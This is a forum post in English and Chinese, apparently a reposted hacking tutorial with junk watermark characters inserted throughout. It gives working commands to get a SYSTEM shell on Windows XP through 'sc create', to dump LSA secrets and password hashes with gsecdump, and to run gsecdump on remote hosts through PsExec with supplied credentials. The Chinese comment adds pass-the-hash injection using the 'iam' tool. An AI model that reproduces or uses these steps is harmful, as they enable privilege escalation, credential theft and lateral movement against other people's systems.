o get a DOS Prompt as NT system:* g3 p+ T) @ Z7 i& p
" r8 Y, A2 g+ ]2 T: _
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact- Q' F4 r: b% e( q
[SC] CreateService SUCCESS
) O. ?" C+ g0 H# M( j6 z
2 B9 g4 ?4 r9 w9 F; I/ VC:\>sc start shellcmdline
7 B1 d3 [" o& C6 i! s' E: q[SC] StartService FAILED 1053:
H7 \2 n# S/ d' r9 h' O# X2 R! y0 W) P* J6 _3 g
The service did not respond to the start or control request in a timely fashion.8 f9 t* e w5 Z/ K
! C5 d& f7 c6 f, w, l7 S; x6 z6 g" ^$ e
C:\>sc delete shellcmdline
9 M" K2 q; G6 e- t[SC] DeleteService SUCCESS
/ L- c' w8 c$ b( g; F/ x6 v# g1 S- M: M4 J$ h
------------
* H [5 ~9 A1 K( x. D1 p6 P# _7 s6 Z" Z. @# y
Then in the new DOS window:6 \5 V" `, y0 |4 u% x, l3 q$ y
+ o/ }0 k( [( AMicrosoft Windows XP [Version 5.1.2600]
, J+ i7 ^+ {9 C7 k# k" u(C) Copyright 1985-2001 Microsoft Corp.
" _. d$ q7 |' ]2 p6 D( \4 g0 z( O z! s' y) Z" Z
C:\WINDOWS\system32>whoami; B! J% y6 i: O, b( h2 T
NT AUTHORITY\SYSTEM% X w4 \, M' l5 M* }2 E
0 C6 z) w2 o1 w9 \C:\WINDOWS\system32>gsecdump -h' Q6 K* R w9 L% E9 [3 B7 u: c7 ?0 v
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)$ W' O# [3 } ]
usage: gsecdump [options]. u: _! N' b: r. A) X. w
& p3 x+ Y4 u6 p2 `& a5 q& Goptions:$ R# f/ U; b0 g% q. u+ B- ~
-h [ --help ] show help
* Z; n) v0 f4 W3 V-a [ --dump_all ] dump all secrets8 s5 U p9 Z! a& F: d& m
-l [ --dump_lsa ] dump lsa secrets& l% D2 R% z. C" s& l' D8 G8 Y
-w [ --dump_wireless ] dump microsoft wireless connections
5 W5 q ?& ]) a; m# J" z: e-u [ --dump_usedhashes ] dump hashes from active logon sessions
3 q5 z- x! m3 G: [-s [ --dump_hashes ] dump hashes from SAM/AD: k. I! I' b# Q8 e; W7 a x1 O
/ Q# w4 F; O$ G rAlthough I like to use:- V Q' Q7 }# d6 f, C5 ~3 W
! F" {/ G# _% y" `
PsExec v1.83 - Execute processes remotely
9 {- A& T7 ]- J+ k, h0 A4 v' mCopyright (C) 2001-2007 Mark Russinovich) g2 C2 z- y# d* j' X! ~+ d
Sysinternals - 链接标记[url]www.sysinternals.com[/url]+ U) Z0 d7 [! n0 o3 o
- n! c* `# a9 H0 F3 V) C4 m, l
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
9 }/ u) d* i' M
5 {. _$ m, K4 _; N$ }to get the hashes from active logon sessions of a remote system.6 b- i" F* {* v8 U- |% I
6 e) p: ] G7 a. C4 O
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.1 Q n, h5 i& o$ p+ C
$ P/ f) q6 E3 f6 R提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.! W, o' u( I1 s' k0 e. _5 l/ q
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]. _+ c( F* `# i% _' @* }4 K# ?
: @3 j1 W* V U% ?) w" J
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。 E" \3 r$ P' A$ L
|
发表于 2012-11-6 21:09:29
收藏
支持
反对